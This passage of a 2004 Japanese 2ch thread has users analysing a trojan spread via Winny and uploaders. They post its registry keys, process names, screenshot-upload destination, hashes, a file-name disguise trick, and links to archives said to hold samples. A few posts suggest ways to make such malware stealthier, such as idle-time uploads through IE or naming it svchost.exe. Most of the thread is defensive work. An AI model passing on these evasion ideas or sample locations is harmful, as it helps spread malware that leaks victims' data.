次スレ、↓の人よろ

938 :[名無し]さん(bin+cue).rar:04/09/23 21:00:23 ID:kBaEXo4M
次スレ建てました。
苺きんたまは流行種1にまとめサイトurl貼りだけ。
必要なら流行種パターン作ってください。
あと使い終わってから移動よろ。

【警報】Winnyを狙ったワーム・ウイルス情報 Part27
http://tmp4.2ch.net/test/read.cgi/download/1095939735/

939 :[名無し]さん(bin+cue).rar:04/09/23 21:01:49 ID:h0nUPIzO
>>938


類似品を大量に作れるのならうpロだ自体を削除しないととまらないかもしれんね

940 :627:04/09/23 21:03:22 ID:Q+leSqll
>>934

>>930
1のやつはTrojan.Upchan。
CRCも同じ。

941 :[名無し]さん(bin+cue).rar:04/09/23 21:04:41 ID:Ze0M08FR
>940
あい。了解。

942 :[名無し]さん(bin+cue).rar:04/09/23 21:05:49 ID:h0nUPIzO
>>929
2ch史上最多の逮捕者数になるかも試練ね

943 :[名無し]さん(bin+cue).rar:04/09/23 21:06:57 ID:adI/sxzM
もー京○府○は何やってんだよ! こういう時こそ役に立てや!
K札権力であぷろだ止めろよ!
自動ポルノや違法コピーだらけで逮捕せにゃならん奴がまだまだ増えるぞ!

944 :[名無し]さん(bin+cue).rar:04/09/23 21:07:23 ID:dlC1dSfw
サイズも更新日時をそのまま。苺のやつうpっただけ

945 :[名無し]さん(bin+cue).rar:04/09/23 21:10:16 ID:OB9dwy0R
実はこのウィルスは京○府警の罠

946 :[名無し]さん(bin+cue).rar:04/09/23 21:12:03 ID:cDvdfQLH
教徒不敬のジサクジエーン

947 :[名無し]さん(bin+cue).rar:04/09/23 21:12:32 ID:WWPl3lDC
っていうか、PC名とユーザー名が違うのに晒された画像が同じのがあるんだけど、何で?
もしかして予め画像は用意されてるとか?


948 :[名無し]さん(bin+cue).rar:04/09/23 21:13:11 ID:aNtJ/kjz
消防士が放火するって事件が時々あるよね。

949 :[名無し]さん(bin+cue).rar:04/09/23 21:13:51 ID:62NRg8JO
>>938 お疲れちゃん 

>>947 ダブリもでるらしいよ 知らん人と

950 :[名無し]さん(bin+cue).rar:04/09/23 21:16:45 ID:WWPl3lDC
>>938
おつかれ

>>949
じゃあ晒された画像はそのどっちかのデスクトップだけってこと?

しかしまぁ苺キンタマのページまとめあげた人は仕事早いなぁ・・

951 :[名無し]さん(bin+cue).rar:04/09/23 21:20:34 ID:62NRg8JO
>>950 流れが速すぎて状況確認できんのよ すまんこ
    時間差みたいなことをいってる人がいたみたいだが…

952 :[名無し]さん(bin+cue).rar:04/09/23 21:21:52 ID:b+is4Zm9
これで京都父兄がまったく動かなかったら父兄が第一容疑者

953 :[名無し]さん(bin+cue).rar:04/09/23 21:25:46 ID:WWPl3lDC
>>951
いやいや、わざわざスマン。ありがとう。


悪趣味とは思うがヲチ面白いなぁw
慌ててウィルススキャンしてるの見てると面白すぎるw

954 :[名無し]さん(bin+cue).rar:04/09/23 21:28:10 ID:sOLz9K12
>>950
自分がアップしたファイル名がわからないので、完了後に一番上にある画像のリンクが使われるらしく、
複数同時にアップされたような場合、同じファイルを指してしまうことがあるらしい。
ファイル自体は、アプロダに個々に存在してるので、リンクだけが同じになってしまっている。


955 :[名無し]さん(bin+cue).rar:04/09/23 21:30:17 ID:xduUn+v/
新種というか>>867の詳細

原種/亜種ともに
 Software\Borland\Locales
 Software\Borland\Delphi\Locales
 Software\Meropa
が存在。DelphiとMeropa使いの犯行

 Software\Microsoft\Microsotf
このオチャメな行はなんだろう↑?

Maropa2chなる文字列もあるが、ユーザーエージェントか? これを弾けばBBS投下はとまるかも

今度はBBS投下文字列を少しいじって
【コンピュータ名】【ユーザー名】【今こんな事やってます】になってる
メール欄には「私は升ツールを使用しようとして 罠にかかりました」と表示

ターゲット板が、ネットゲーム、ネトゲサロン、ち〜と、雑談系2、厨房!に変更

感染プロセス名は sugoimonoss.com

SS投下先は ttp://up.isp.2ch.net/upload/c=03okari/index.cgi で同じ
わざわざ、閲覧しやすいように ttp://v.isp.2ch.net/ に変えて投下SSを案内

コンパイル時の差異によるバイナリ差があるので、オリジナルに第三者が手を加えた
ものではなく、オリジナル開発者による、パラメータ変更の第二段と考えるべきだろう。

以上、おわり

956 :[名無し]さん(bin+cue).rar:04/09/23 21:30:37 ID:adI/sxzM
壁紙やアイコンが見えない状態のSSは成りすましが可能なので注意だな

957 :[名無し]さん(bin+cue).rar:04/09/23 21:31:26 ID:y1QaqjMm
俺は実行したくないけどFW超える物なのか?
EXE単位で許可するFWなんだがこいつをスルーするのか?

958 :[名無し]さん(bin+cue).rar:04/09/23 21:33:27 ID:cDvdfQLH
>>957
スルーする訳ない、安心汁

959 :[名無し]さん(bin+cue).rar:04/09/23 21:35:20 ID:fWYTZuQ9
>>957
ホワイトリストで許可を出してるFWなら大丈夫だろう。
何を使って、どんな設定にしてるのかわからんけど。

960 :[名無し]さん(bin+cue).rar:04/09/23 21:35:37 ID:62NRg8JO
>>954 ありがとうさん

>>955 解析おつかれさん

961 :[名無し]さん(bin+cue).rar:04/09/23 21:36:55 ID:xduUn+v/
f/wに関しては、ポート指定物は無力
アプリレベルで止めるものでも、そのうち、ありがちなアプリ名に偽装
した亜種が出てきたら、見分けつかない。 プロセス名は簡単に変えれるっぽい。

962 :[名無し]さん(bin+cue).rar:04/09/23 21:44:00 ID:adI/sxzM
あとProxomitronとか狙い撃ちされたらFW効かなくない?

963 :[名無し]さん(bin+cue).rar:04/09/23 21:46:54 ID:o03myoTB
今んとこ2種類だけか?

・苺キンタマ(オリジナル)
〔ファイルサイズ〕677,376 Bytes
〔CRC16〕56B9
〔CRC32〕FC57D234
〔MD5〕 b7921479f8a9079c59c20ef5964338e4

・苺キンタマ(亜種)
〔ファイルサイズ〕677,376 Bytes
〔CRC16〕775A
〔CRC32〕022A1F64
〔MD5〕 5f323255060be4ddf715fa8fa88f883a


964 :[名無し]さん(bin+cue).rar:04/09/23 21:47:24 ID:rREsfmrT
>>864の〜ol25.zipをダウンロードして解凍してみたらconfig.txtだけ解凍に失敗した
なんでだろう

965 :[名無し]さん(bin+cue).rar:04/09/23 21:47:36 ID:cDvdfQLH
その内作者がShareにウィルスのソース流しそうな予感

966 :[名無し]さん(bin+cue).rar:04/09/23 21:48:53 ID:h0nUPIzO
>>965
ガクガクブルブル

967 :[名無し]さん(bin+cue).rar:04/09/23 21:51:06 ID:h0nUPIzO
つか、これって知り合いが感染しても自分のデータが流出する可能性があるんだよな?

968 :[名無し]さん(bin+cue).rar:04/09/23 21:51:47 ID:3I9wKrJu
>>964
readmeに書かれているが関係してるのかな?

解凍するだけでエクスプローラが落ちた_| ̄|○

969 :[名無し]さん(bin+cue).rar:04/09/23 21:51:50 ID:xduUn+v/
>>963
>>864の config.txt(今のとこ苺キンタマ亜種)で、
漏れのとこに保護してあるのは
〔ファイルサイズ〕699,392 Bytes
〔CRC32〕2A8BEBAA
なんだが……?

970 :[名無し]さん(bin+cue).rar:04/09/23 21:52:08 ID:OVqRCEPB
>>967
嫌がらせでやる奴いるかもな・・

971 :[名無し]さん(bin+cue).rar:04/09/23 21:56:22 ID:r3qqNy/W
これってファイルをダブルクリックしなければ大丈夫なんでしょうか?

972 :[名無し]さん(bin+cue).rar:04/09/23 21:57:24 ID:h0nUPIzO
>>971
亜種も出てきてるしその考え方はよくない



973 :[名無し]さん(bin+cue).rar:04/09/23 21:57:29 ID:cDvdfQLH
うん

974 :[名無し]さん(bin+cue).rar:04/09/23 21:58:30 ID:h0nUPIzO
亜種情報
インターネット上で確認されたファイル名は[1095925509796_AreTool25.zip]、解凍後にラグナロクオンライン関係のツールを装っています。
実行ファイルは[config.txt]でファイルサイズは683KB。.txtの後ろに大量の空白があり、MS-DOSファイル名はCONFIG~1.EXEとなっています。
Windows95で実行してみましたが、ファイルの作成、レジストリの追加に関しては[shellsystem.exe]を[sugoimonoss.com]に変えただけのものと思われます。

975 :[名無し]さん(bin+cue).rar:04/09/23 21:58:49 ID:cDvdfQLH
Delphi程度の言語でしかウィルスを書けない作者が、Windowsのセキュリティホールを利用した
ウィルスを開発するなんてまず無理なんで、とりあえずクリッコしなけりゃだいじょーぶさー

976 :[名無し]さん(bin+cue).rar:04/09/23 21:58:49 ID:y1QaqjMm
俺ならIEを起動してうpろだに書き込むようなプログラムにする
2chに無理に書く必要は無い
IEに許可与えてない奴は居ないだろうしな
ウイルス感染がばれ易くなるから、マウス、キーボード操作がある一定時間無い時をAFKだと認識してUP
SSは定期的に溜め込んで置く

977 :[名無し]さん(bin+cue).rar:04/09/23 21:58:53 ID:r3qqNy/W
>>971
そうですね・・・。うかつにアップローダのファイルも開けない状態になってしまった・・・。

978 :963:04/09/23 22:00:13 ID:o03myoTB
>>969
漏れが書いてる亜種は>>864のアプロダと同じとこにうpしてあった
ttp://picopico.dip.jp/ragnarok/data/1/1095920291421_wana.zip
これ↑のなかの「AretoolTest25〜.exe」ってやつ
バイナリのなか見たら亜種クサかったんで

ちなみにこいつ↓を落としたんだが、964氏と同じでconfigが解凍できなかった
ttp://picopico.dip.jp/ragnarok/data/1/1095925509796_AreTool25.zip


979 :[名無し]さん(bin+cue).rar:04/09/23 22:00:24 ID:cDvdfQLH
svchost.exeとかにするな俺なら

980 :[名無し]さん(bin+cue).rar:04/09/23 22:00:35 ID:wowdpe/L
>>964
漏れも。解凍はしてないけど、解凍ソフトのメニューで右クリックをしようとしたらメニューが表示できないとか言われてびびった。
一応感染してないかどうか調べようとして、ファイル検索では見つからなかったがレジストリエディタでsugoimonoss.comがヒット(;´Д`)
びっくりしてよく見て見たらWindowsの検索履歴だった罠・・・驚かせるなよ_| ̄|○

981 :[名無し]さん(bin+cue).rar:04/09/23 22:05:12 ID:Q+leSqll
>>969
・苺キンタマ(オリジナル)
〔ファイルサイズ〕677,376 Bytes
〔CRC32〕FC57D234
〔MD5〕B7921479F8A9079C59C20EF5964338E4
〔SHA1〕722BB2E6D12167F005E1935B2D3E01229DD30CC5

・苺キンタマ(亜種)
〔ファイルサイズ〕699,392 Bytes
〔CRC32〕2A8BEBAA
〔MD5〕3EC55FBC1036ECF95F5EC15DFBD94DD1
〔SHA1〕3FA0EC2C7062367E7C0ABD0FE43884504906FD11

こんなのか。

982 :[名無し]さん(bin+cue).rar:04/09/23 22:08:13 ID:7p6CJmmF
>>969
漏れはWinRARで解凍したら「パスとファイル名の長さの合計は 260 文字を超えることはできません」と出たから、Cドライブ゙直下で解凍したら、解凍できたが、これと一緒ではないか?

983 :[名無し]さん(bin+cue).rar:04/09/23 22:08:55 ID:h0nUPIzO
tp://idol.bbspink.com/test/read.cgi/ascii2d/1095933366/380
このウィルスらしきものは既出?

恐ろしくて直リンできやしない

984 :982:04/09/23 22:09:10 ID:7p6CJmmF
誤爆スマソ。>>969ではなく>>978

985 :[名無し]さん(bin+cue).rar:04/09/23 22:09:33 ID:xduUn+v/
作成日付も入れとこう
オリジナル 04/09/22 15:57
亜種 04/09/23 14:52

昨夜の騒ぎを楽しんだ後、変えてやがる


986 :[名無し]さん(bin+cue).rar:04/09/23 22:10:05 ID:h0nUPIzO
愉快犯かよ

987 :[名無し]さん(bin+cue).rar:04/09/23 22:10:10 ID:qRMK2VgF
だれか、もう一回ノートン先生用の定義パッチアップしてよぉ〜。

タスクマネージャーで見るとshellsystem.exeが二匹も
いるんだよぉ〜。くぞぉ〜

988 :964:04/09/23 22:10:44 ID:rREsfmrT
同じ奴が多いな
>>982のやり方で無事に解凍できたぞ

989 :[名無し]さん(bin+cue).rar:04/09/23 22:11:24 ID:mgVunU57
>>987
(・∀・)コンニチハ!!

990 :[名無し]さん(bin+cue).rar:04/09/23 22:11:29 ID:1QD87Wms
馬鹿ばっかだなこのスレ

991 :[名無し]さん(bin+cue).rar:04/09/23 22:11:41 ID:fWYTZuQ9
つまり関連スレを巡回してるってことか。
いくつかアイディア出してたやつがいるけど、それが取り込まれた亜種
が流れてくる日も近いなこりゃ。(´・ω・`)

992 :964:04/09/23 22:12:48 ID:rREsfmrT
>>988
できたぞってなんか命令みたいだな_| ̄|○
訂正する

同じ奴が多いな
>>982のやり方の通りにやったら無事に解凍できた
configだけ解凍できない奴は>>982の通りで出来ると思う

993 :[名無し]さん(bin+cue).rar:04/09/23 22:13:00 ID:h0nUPIzO
誰かが言っててたな製作者がwinnyとかにウィルスソースを流したらどうなるだろうって

994 :[名無し]さん(bin+cue).rar:04/09/23 22:14:03 ID:Gd3swaZK
最初のウィルス以前にうpされたファイルはとりあえず安心か?

995 :[名無し]さん(bin+cue).rar:04/09/23 22:14:05 ID:AH6SroMo
>>993
nyやってるだけの奴にマシな技術の持ち主などいない

996 :963:04/09/23 22:14:37 ID:o03myoTB
>>982
解凍できたよ
トンクス

997 :[名無し]さん(bin+cue).rar:04/09/23 22:14:56 ID:xduUn+v/
これのオリジナルは、トロイ開発キットの様相を呈していたから
亜種は簡単に作れるんだろーな。まだ発現させてない機能もある
ようだし。

で、1000取りよろ

998 :[名無し]さん(bin+cue).rar:04/09/23 22:15:01 ID:cDvdfQLH
ソース流されたらちょっとパス変えるだけで定義ファイルを回避する事も可能

999 :[名無し]さん(bin+cue).rar:04/09/23 22:15:47 ID:A3XC4jaX
1000!

1000 :[名無し]さん(bin+cue).rar:04/09/23 22:16:06 ID:JKMNRGue
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

238 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)